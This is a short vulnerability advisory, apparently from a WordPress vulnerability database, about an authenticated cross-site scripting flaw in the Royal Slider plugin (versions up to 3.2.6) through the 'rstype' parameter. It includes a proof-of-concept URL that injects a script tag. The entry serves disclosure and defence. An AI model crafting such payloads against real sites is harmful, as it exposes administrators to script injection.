WordPress Plugin Vulnerabilities
Royal Slider <= 3.2.6 - Authenticated Cross-Site Scripting (XSS)
Description
The vulnerability exists due to insufficient sanitation of user-supplied data in "rstype" HTTP GET parameter when creating / editing a slider.
A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=new_royalslider&action=edit&rstype="><script>alert(String.fromCharCode(88,83,83))</script>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Gerard Arall
Submitter website
Verified
No
WPVDB ID
Timeline
Publicly Published
2015-09-12 (about 8 years ago)
Added
2015-09-13 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)